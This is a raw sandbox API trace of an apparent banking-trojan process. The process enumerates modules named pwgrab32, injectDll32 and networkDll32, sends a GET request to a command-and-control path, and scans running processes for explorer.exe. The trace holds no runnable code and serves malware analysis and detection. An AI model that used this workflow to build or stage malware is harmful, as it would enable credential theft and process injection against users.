	[0232.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8980
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0232.258] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b79b0, Size=0x20) returned 0x2777dd0
	[0232.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0232.258] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2777dd0, Size=0x20) returned 0x2778168
	[0232.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0232.258] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 0
	[0232.258] GetLastError () returned 0x12
	[0232.258] FindClose (in: hFindFile=0x22b6a40 | out: hFindFile=0x22b6a40) returned 1
	[0232.258] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0232.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745158
	[0232.258] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x2745158, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0232.259] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.259] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.259] CloseHandle (hObject=0x5f8) returned 1
	[0232.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0232.259] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0232.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745158
	[0232.259] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x2745158, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0232.259] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.259] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.259] CloseHandle (hObject=0x5f8) returned 1
	[0232.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0232.259] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0232.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745158
	[0232.259] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x2745158, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0232.259] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.259] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.259] CloseHandle (hObject=0x5f8) returned 1
	[0232.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0232.259] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0232.260] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745158
	[0232.260] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x2745158, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0232.260] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.260] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.260] CloseHandle (hObject=0x5f8) returned 1
	[0232.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.260] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0232.260] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0232.260] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745158
	[0232.260] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x2745158, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0232.260] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.260] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.260] CloseHandle (hObject=0x5f8) returned 1
	[0232.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.260] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0232.260] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0232.260] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745158
	[0232.260] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x2745158, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0232.260] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8
	[0232.260] GetFileTime (in: hFile=0x5f8, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0232.260] CloseHandle (hObject=0x5f8) returned 1
	[0232.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x72475be0, dwHighDateTime=0x1d50a6a)) 
	[0232.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0232.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b64b0) returned 1
	[0232.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26e438) returned 1
	[0232.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8980) returned 1
	[0232.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738590) returned 1
	[0232.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22caa30) returned 1
	[0232.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x234f30) returned 1
	[0232.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778168) returned 1
	[0232.261] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0232.261] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0232.261] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0232.261] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0232.261] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/zLcuDUpAVn4KarARm9Ri/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0232.261] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0232.261] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0232.670] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0232.670] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0232.670] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0232.670] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7638
	[0232.670] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22b7638, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22b7638*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0232.670] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0232.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22b7638, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0232.671] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b77a0
	[0232.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22b7638, cbMultiByte=3, lpWideCharStr=0x22b77a0, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0232.671] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0232.671] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0232.671] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75c0
	[0232.671] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b76b0
	[0232.671] lstrcpynW (in: lpString1=0x22b76b0, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0232.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0232.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe58) returned 1
	[0232.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b77a0) returned 1
	[0232.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b75c0) returned 1
	[0232.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7638) returned 1
	[0232.671] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5d8
	[0232.673] Process32FirstW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0232.675] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0232.675] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0232.675] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0232.676] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0232.676] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0232.676] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.677] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0232.677] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0232.678] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0232.678] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.679] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0232.679] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0232.680] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0232.680] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0232.681] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0232.681] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0232.682] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0232.682] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0232.683] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0232.683] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.684] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.684] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.686] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.686] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.687] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.687] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.687] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.688] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.688] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.688] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.689] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.689] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.692] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.692] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0232.693] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0232.693] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.694] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.694] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0232.695] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0232.695] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.696] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0232.696] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.696] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.696] Process32NextW (in: hSnapshot=0x5d8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.697] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
